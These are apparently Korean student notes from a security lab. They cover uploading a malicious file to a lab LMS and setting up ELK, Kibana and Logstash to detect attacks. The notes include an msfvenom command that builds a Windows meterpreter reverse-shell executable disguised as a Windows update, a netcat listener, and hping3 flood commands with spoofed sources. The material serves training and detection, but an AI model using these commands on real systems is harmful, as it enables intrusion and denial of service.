DAY14

미션4: lms.st.kr kali로 악성파일을 업로드하고 이를 탐지해보자

upload.php
< tr>
< td>1< /td>
< td>윈도우패치프로그램< /td>
< td>< a href="/uploads/winddows_update_20240114001.exe">
< /tr>
*업로드 기능을 사용하기 위해서는 enctype="multipart/form-data"; 필요
input type="file" 줄 id, placeholder, name uploaded로 변경
파일 올리기 버튼을 누르면 업로드 공격 시작이라고 떠야한다
    if (isset($_POST['upload'])){ -> 작동하는 것

$target_path="uploads";
    uploads 파일 생성 (권한777)

winddows_update_20250114001.exe 파일 생성하기(악성코드)
    msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=100.100.100.1 LPORT=4444 -b "\x00" -f exe -o /home/kali/windows_update_20240114001.exe

생성된 파일을 올린 후 파일올리기 버튼을 누르면 업로드 공격 성공이 뜬다!

nc -l -p 4444 (4444번 포트 열기)
netstat -ant | grep 4444

정보보안의 꽃은 reversing

wireshark
r2 ~ utm
관리자가 받은 파일을 실행 시키면 4444 공격이 보인다
    kali 100.100.100.1 >125.246.95.254 확인
    해커의 ip 노출

미션5: 메인서버로 오는 패킷(http ftp mail)등을 selk로 보내서 분석해보자

목적: 시각화

침투방법은?
1. 피싱 사이트
2. 파일 업로드
3. 이메일 보내기

ELK를 이용한 침투 흔적을 찾아라!
*elasticsearch 9200 : 검색엔진
*kibana 5601 : 시각화프로그램 (엔진에스 추가사용)
*logstash : 보내주는 파일을 읽어서 보내주거나 필터링 해주는 프로그램
*네트워크 흔적
*로그 흔적

참고 사이트://m.blog.naver.com/kimdj217/221319606131

Bootstrap Example

elasticsearch 설정

[selk]
su
netstat -ant | grep 9200

nano /etc/elasticsearch/elasticsearch.yml
    network.host : 0.0.0.0
systemctl start elasticsearch
    에러뜰 경우 bootstrap 설정 두개 열어주기
       disovery.seed_hosts
       cluster.initial_master_nodes

curl -X GET "localhost:9200"
systemctl enable elasticsearch

Bootstrap Example

kibana 설정

netstat -ant | grep 5601

systemctl start kibana
10.0.2.3:5601 연결 잘 안되므로 nginx에 탑재할 예정

sudo nano /etc/nginx/sites-available/default
server {
    listen 80;
    server_name _;
    location / {
       proxy_pass http://localhost:5601;
       proxy_http_version 1.1;
       proxy_set_header Upgrade $http_upgrade;
       proxy_set_header Connection 'upgrade';
       proxy_set_header Host $host;
       proxy_cache_bypass $http_upgrade;
    }

systemctl status/start/enable/restart/reload elasticsearch/kibana/nginx

미션: dvwa.st.kr 공격을 kibana로 분석해보자

*공격
ping > hping3 > nikto > Brute Force
access.log

ping dvwa.st.kr

hping3 st.kr -S -i u50 -c 100
hping3 st.kr -a st.kr -S -c 100 -u 100
hping3 125.246.95.254 -a 125.246.95.254 -S -c 10
hping3 --flood --rand-source st.kr

nikto -host dvwa.st.kr

dnsenum dvwa.st.kr

*공격 후에 대한 로그 확보
[win7]
cmd
ftp 10.0.2.15 (dvwa/123456)
cd public_html
cd logs
dir
get access.log
bye

(경로 c:user/manager/access.log)

cd /var/log/apache2
cp access.log /backup

*시각화
access.log > elastic 사이트에 업로드 > import > 로그 시각화 가능
Bootstrap Example

시각화(kibana)를 위한 사전 설치 항목(filebeat, packetbeat, logstash)

NAT 설정 후 설치
(오류시 dns확인 :168.126.63.1로 변경 (netplan/50[tab]도!!)

[3server]
curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install filebeat
sudo apt -y install packetbeat

nano /etc/filebeat/filebeat.yml(확인)
nano /etc/packetbeat/packetbeat.yml(확인)

[log]
netstat -ant | grep 5044
연결 없음
systemctl start logstash

sudo apt -y install logstash
nano /etc/logstash/conf.d/beats-input.conf

input {
beats {
    port => 5044
   }
}

nano /etc/logstash/conf.d/elasticsearch-output.conf
output {
if [@metadata][pipeline] {
   elasticsearch {
    hosts => ["localhost:9200"]
    manage_template => false
    index => "%{[@metadata][beat]}-%{[@metadata][version]}-%{+YYYY.MM.dd}"
    pipeline => "%{[@metadata][pipeline]}"
  }
} else {
   elasticsearch {
     hosts => ["localhost:9200"]
     manage_template => false
      index => "%{[@metadata][beat]}-%{[@metadata][version]}-%{+YYYY.MM.dd}"
    }
}
}

sudo -u logstash /usr/share/logstash/bin/logstash --path.settings /etc/logstash -t
    오류해결중...ㅠㅠ
sudo nano /etc/logstash/jvm.options
# 기존
-XX:+UseConcMarkSweepGC
# 대체
-XX:+UseG1GC

미션1: 해커로부터 오는 이메일 정상화 시키기